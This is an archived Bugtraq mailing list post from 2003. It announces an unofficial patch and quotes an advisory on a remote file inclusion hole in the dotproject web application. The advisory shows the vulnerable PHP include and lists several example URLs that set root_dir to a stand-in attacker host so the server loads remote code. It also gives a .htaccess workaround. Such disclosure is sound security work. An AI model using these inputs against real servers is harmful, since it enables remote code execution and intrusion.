Bugtraq mailing list archives
Re: dotproject Remote Code Execution Vulnerability : Patch
From: "Frog Man" <leseulfrog () hotmail com>
Date: Wed, 29 Jan 2003 16:35:49 +0100
A non-official patch has been created for this hole and is published onhttp://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=d&l=us (english version) .
From: mindwarper () hush com To: bugtraq () securityfocus com Subject: dotproject Remote Code Execution Vulnerability Date: Wed, 29 Jan 2003 04:02:24 -0800 dotproject Remote Code Execution Vulnerability (By Mindwarper) <------- -------> ---------------------- Vendor Information: ---------------------- Homepage : http://www.dotproject.net Vendor : informed Mailed advisory: 28/01/03 Vender Response : None ---------------------- Affected Versions: ---------------------- dev20030121 ---------------------- Vulnerability: ----------------------dotproject is a PHP+MySQL beta level web based project management and tracking toolthat dotmarketing started in Dec. 2000.Inside the directory /modules/ multiple files try to include classdefs/date.php without defining $root_dir first and allow remote attackers to inject their ownservers if globals are set on. Example Code from modules/projects/addedit.php: ****** <?php ## ## Files modules: index page re-usable sub-table ## require_once( "$root_dir/classdefs/date.php" ); $df = $AppUI->getPref('SHDATEFORMAT'); $tf = $AppUI->getPref('TIMEFORMAT'); ******As you can see nothing happens before the require_once function is called and thereforewith globals set on an attacker may include remote files. Example: http://victim/dotproject/modules/files/index_table.php?root_dir=http://attacker this works also on http://victim/dotproject/modules/projects/addedit.php?root_dir=http://attacker http://victim/dotproject/modules/projects/view.php?root_dir=http://attacker http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://attacker http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attacker http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://attacker ---------------------- Solution: ---------------------- Please check the vendor's website for new patches.As a temporary solution, create a .htaccess file that contains 'Deny from all'. Place it in the /modules/ directory and that should block remote users from accessing it.---------------------- Contact: ---------------------- Name: Mindwarper Email: mindwarper () hush com Website: http://mindlock.bestweb.net <------- -------> Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427
_________________________________________________________________
Current thread:
- Re: dotproject Remote Code Execution Vulnerability : Patch Frog Man (Jan 29)